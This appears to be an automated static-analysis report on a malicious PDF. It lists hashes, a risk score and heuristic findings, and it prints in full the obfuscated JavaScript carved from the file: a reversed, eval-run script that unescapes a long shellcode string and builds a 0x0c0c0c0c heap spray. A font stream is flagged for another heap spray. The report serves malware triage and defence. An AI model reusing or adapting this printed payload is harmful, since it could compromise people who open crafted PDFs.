Malicious PDF — malware analysis report

Static analysis result for SHA-256 539cc0152e0467d4…

MALICIOUS

PDF

69.2 KB First seen: 2026-05-10
MD5: 35ac96bac259532ce273b72bf57fae36 SHA-1: 21c436634f40e93977ba5d63a9c489854ebebe29 SHA-256: 539cc0152e0467d4cf502fba58c0a42c17effc2169f777e95fa6ba4717171ffc
68 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 3718 bytes
SHA-256: bc02c88bef4d6f96b8ab533fb7536e2be7456c1c8d496c69cebffc4a79c9c871
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+RfAtj=]o[dTIMw )++o;0f1x0<o;0=o( rof ;)(yarrA wen = dTIMw rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.Upz = RfAtj ;Upz =+ Upz )00008x0 < htgnel.Upz(elihw ;)2/63556 ,0(gnirtsbus.E = Upz ;y =+ E ;N =+ E ;)2/)42x0-c0c0x0( ,0(gnirtsbus.y = E ;y=+y )63556 < 8 + 02 + htgnel.y( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (Yj = y rav ;) )""(nioj.)" "(tilps."5a14  u % 2ec8  u % 9524  u % 145e  u % 077a  u % 1d56  u % 3102  u % 0df2  u % ce37  u % 8b9b  u % ff9f  u % 3fdf  u % 57cf  u % 40dd  u % c7c7  u % 9fe5  u % 68e3  u % 49c5  u % 3db7  u % bf0f  u % e49c  u % 30ab  u % b9c6  u % 3752  u % 013e  u % a141  u % f034  u % 81a0  u % 07af  u % 5c68  u % a2c6  u % 09ff  u % 02e7  u % c295  u % e369  u % 9742  u % 76a2  u % 9940  u % 3a16  u % 9de1  u % c60e  u % 05f9  u % 6d4d  u % d4a4  u % 880b  u % 0ec3  u % bfab  u % 3295  u % e1b3  u % 7a9f  u % bfb9  u % b7c6  u % 830e  u % 6cb6  u % 2c39  u % 51c1  u % 2831  u % 89cd  u % bba9  u % 45f0  u % 23ba  u % c7d3  u % 0482  u % 7f5c  u % b716  u % 2159  u % b505  u % 819c  u % 018a  u % 7adb  u % 9087  u % 3d70  u % c66a  u % a6f7  u % ab9a  u % 65e7  u % d8be  u % 3e94  u % 4dc9  u % 80b1  u % 0906  u % 5f9d  u % 9afa  u % 1a9f  u % 5dda  u % 2675  u % 9c1e  u % 1515  u % eeec  u % 0dbd  u % 629b  u % 3459  u % 3690  u % eadd  u % 0eb5  u % bf9c  u % 37e0  u % acbd  u % afbe  u % 908b  u % 1f31  u % ddda  u % 30fc  u % 6c40  u % e038  u % 1365  u % 4fe5  u % 4742  u % 6d9d  u % 40bd  u % 7df4  u % ab99  u % 1b33  u % 339c  u % 0070  u % f211  u % 0070  u % 137d  u % 0070  u % d451  u % ff09  u % ffff  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % ff09  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % ffff  u % 8e6e  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % be50  u % 57ee  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % c   0c   0  u % c   0c   0  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 18bf  u % 2c40  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4038  u % 380c  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 9881  u % b8a1  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 5185  u % a5be  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4509  u % a509  u % 0070  u % bb51  u % 0070  u % 137d  u % 0000  u % 0400  u % 0000  u % 0001  u % 1000  u % 4010  u % 0000  u % 0000  u % 1000  u % 0010  u % ffff  u % ffff  u % 0070  u % 45c5  u % 0070  u % 2e25  u % 1000  u % 1100  u % 0070  u % 7f27  u % 0070  u % ca8a  u % 1000  u % 0010  u % 0070  u % bb51  u % 0070  u % ca8a  u % 1000  u % 1100  u % 0070  u % bb51  u % 0070  u % 2bf7  u % eff7  u % 0030  u % 0070  u % bb51  u % 0070  u % d451  u % 0000  u % 0001  u % 0070  u % bb51  u % 1000  u % 4010  u % 0070  u % 7f27  u % 1000  u % 4210  u % 0070  u % 9951  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % c   0c   0  u % c   0c   0  u % 0070  u % 4809  u % 0070  u % 3309  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % cccc  u % cccc  u % 0070  u % f651  u % 0070  u % fe84  u % cccc  u % cccc  u % 0070  u % 9194  u % c   0c   0  u % c   0c   0  u % " (Yj = N rav ;epacsenu = Yj rav ';
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Open this report in the interactive analyzer, or submit your own file for analysis.